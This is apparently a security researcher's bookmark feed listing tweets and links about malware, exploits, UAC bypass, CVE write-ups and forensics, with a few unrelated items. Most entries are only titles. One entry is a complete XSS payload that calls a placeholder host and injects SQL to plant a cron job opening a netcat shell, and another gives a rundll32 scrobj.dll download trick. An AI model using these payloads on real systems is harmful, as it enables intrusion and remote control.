[Power Shell] [@JohnLaTwC] Example PowerShell Malware - Pastebin.com
RT : Open Excel macro file. Where did that credential prompt come from? Oh hello :
PowerShell  from twitter
yesterday
Twitter
RT : Open Excel macro file. Where did that credential prompt come from? Oh hello :
PowerShell  from twitter
yesterday
Twitter
RT : 16x16pixel to hi-resolution image reconstruction by Deep Learning, and SciPy. Impressive, sources on GitHub.…
from twitter
yesterday
Twitter
RT : Here's my analysis and write-up for the PCAP challenge! > . Feedback and tips we…
from twitter
yesterday
TekDefense PCAP Challenge Write-Up – CYINT Analysis
RT : Here's my analysis and write-up for the PCAP challenge! > . Feedback and tips we…
from twitter
yesterday
ARM Cortex-M0 assembly programming tips and tricks | ARM Connected Community
Assembly code writer? Good ARM Cortex-M0 assembly programming tips and tricks to know:
from twitter_favs
yesterday
Twitter
RT : This looks amazing! :)
from twitter
yesterday
Luckystrike: An Evil Office Document Generator. — #_shellntel
RT : (interesting) - Luckystrike: An Evil Office Document Generator. -
from twitter
2 days ago
MSSQL Agent Jobs for Command Execution
RT : An attack to gain command and control of database servers using MSSQL Server Agent Jobs :
from twitter
2 days ago
Twitter
Applying Machine Learning and AI to help advance cancer research
from twitter_favs
6 days ago
(404) https://twitter.com/JZdziarski/status/778322348709703684
it matters who actually looks at open source code, not who can. even on a high-visibility project, nobody does :v
from twitter_favs
6 days ago
(500) http://[URL
RT : RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct ]
Will reach out and dl a file.
Doesn't exec. dl only
from twitter
7 days ago
Twitter
RT : RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct ]
Will reach out and dl a file.
Doesn't exec. dl only
from twitter
7 days ago
PowerShell-Suite/Bypass-UAC at master · FuzzySecurity/PowerShell-Suite · GitHub
Bypass-UAC, PowerShell framework for UAC attacks (no injecting dll's into explorer!)
from twitter_favs
8 days ago
Twitter
Common post-compromise steps by RDP brute forcers on IaaS. Spot them w/ sysmon or .
AzureSecurityCenter  DFIR  Azure  from twitter_favs
8 days ago
GitHub - massivedynamic/openftp4: A list of all FTP servers in IPv4 that allow anonymous logins.
openftp4 :List of all FTP servers in IPv4 that allow anonymous logins(Ever wondered how many open FTP servers exist)
from twitter_favs
8 days ago
Twitter
RT : Get an agent without powershell.exe in memory with MSBuild.exe ;-)
Empire  from twitter
10 days ago
(500) https://www.punkspider.org/
PunkSPIDER : A global web application vulnerability search engine :
from twitter_favs
12 days ago
Google Translate
Pangu's writeup on CVE-2016-4655, an XNU stack infoleak in OSUnserializeBinary; orig: ; eng:
from twitter_favs
12 days ago
CVE-2016-4655 - PanguTeam
Pangu's writeup on CVE-2016-4655, an XNU stack infoleak in OSUnserializeBinary; orig: ; eng:
from twitter_favs
12 days ago
Twitter
<svg onload=fetch("//HOST/?id=0+union+select'*+*+*+*+*+root+/bin/nc+-lp53+-e+/bin/sh'into+outfile'/etc/cron.d/s'")>
from twitter_favs
13 days ago
Python code - 430 lines - codepad
" NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 "
"jmp dword ptr [ebp+0x40];"

Windows  exploit  from twitter_favs
14 days ago
Twitter
Microsoft IIS WebDAV write code execution
iis_webdav_upload.py

Python  exploit  realtime  from twitter_favs
14 days ago
CTF Hacker - Spreading the knowledge
RT : Finally got back into doing a CTF! WhiteHat pwn3 writeup with a bit of .
from twitter
14 days ago
MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html
RT : MySQL Remote Root Code Execution / Privilege Escalation (0day) CVE-2016-6662
from twitter
14 days ago
How To Put Multiple ISO Files In One Bootable USB Disk | Create Multiboot USB
How To Put Multiple ISO Files In One Bootable USB Disk | Create Multiboot USB
from twitter_favs
15 days ago
Twitter
RT : Fantastic work! A brand new ROP tool using both & inside \o/
from twitter
16 days ago
Twitter
capstone + keystone + pyelftools + ugly glue = ropstone
from twitter_favs
16 days ago
Twitter
RT : Papers on sniffing typed words via a smartwatch. Not good enough for (long) passphrase guessing ATM(?), but beware:
from twitter
16 days ago
MBA/README.md at master · GlacierW/MBA · GitHub
RT : Malware Behavior Analyzer - MBA
> QEMU based Sandbox
from twitter
16 days ago
Twitter
Bloody cyclists took me 2 hours to get past
from twitter_favs
16 days ago
News | Mars Rover Views Spectacular Layered Rock Formations
's rover views spectacular layered rock formations exploring "Murray Buttes"
NASA  Curiosity  from twitter_favs
17 days ago
Twitter
's rover views spectacular layered rock formations exploring "Murray Buttes"
NASA  Curiosity  from twitter_favs
17 days ago
Twitter
RT : Virtual Machine Memory Acquisition, or where to get which VM memory image.

Slides:
DFIR  from twitter
20 days ago
Untitled (http://www.deer-run.com/~hal/Detect_Malware_w_Memory_Forensics.pdf)
RT : Virtual Machine Memory Acquisition, or where to get which VM memory image.

Slides:
DFIR  from twitter
20 days ago
Twitter
RT : Uninitialized Stack Variable – Windows Kernel Exploitation
from twitter
20 days ago
GitHub - mwrlabs/XRulez: A command line tool for creating malicious outlook rules
RT : We just released a tool for creating malicious outlook rules, writeup: code:
from twitter
21 days ago
Malicious Outlook Rules
RT : We just released a tool for creating malicious outlook rules, writeup: code:
from twitter
21 days ago
Twitter
MS Edge - CSS Visited Links. Yet another variation of the same old (but great) trick.
from twitter_favs
21 days ago
CSS History Leak or “I know where you’ve been” – Broken Browser
MS Edge - CSS Visited Links. Yet another variation of the same old (but great) trick.
from twitter_favs
21 days ago
Twitter
I fixed this issue in less than 24h after being reported. Beware when analyzing ELFs, don’t trust any tool at all
from twitter_favs
23 days ago
Untitled (https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45542.pdf)
RT : This is one of the most important web sec papers in recent history: (section 3.4 is where the juicy bits are)
from twitter
23 days ago
Twitter
If attackers want to fingerprint sandboxes, they simply use gatherNetworkInfo.vbs from Windows, no dev effort
from twitter_favs
25 days ago
« earlier      
#fr #hacking #homepage #security 00 01 02 03 06 31c3 44con adfsl analysis android anonymous apple apps asm awesome b2b backdoor backtrack backup bash bheu bhusa blackhat blackhole blog blogpost bm book books boot browser brucon bsideslondon bugbounty burp charliehebdo chart cheatsheet chrome cloud cocoa code coding comedy comic crack crawler csp css ctf cyber_warfare dc4420 decompiler defcon design dev dfir dfrws diy dns docker duqu eclipse electronics encryption exploit fail firefox flame forensic forensics fr free freebsd fuzzer fuzzing game gaming gdb geek gnu google graphs gtd gui hack hacker hackers hacking hacklu hardening hardware hash heartbleed homepage howto html5 https icon icons ida ids ie ie9 infosec injection ios iphone ipython iso it itsec java javascript jesuischarlie jquery js jvm kali kernel lab learn links linux mac malware malwareanalysis malwaremustdie mbr metasploit mitm monitoring movies mq netsec network news nginx nmap ntp ohm2013 oldschool ollydbg opensource oprahssl oracle os oss osx owasp pacsec password pdf pentest pentesting personal php plot poc portable postgresql powershell privacy programming pwn2own python qt raspberrypi rce re reconmtl rehints remwa reverse_engineering reverseengineering reversing root ror rowhammer ruby sandbox sans scada scanner screencast security seo shellcode shellter slides software sqli sqlinjection ssh ssl stat stuxnet suricata svg sysadmin tech terminal testbed tip tips tool tools tor tricks tutorial tweak unix usa usb video videos virginia vm voip volatility vpn vulnerability waf web web2py webdev websec wii win windbg windows windows8 writeup xss zeronights

Copy this bookmark:



description:


tags: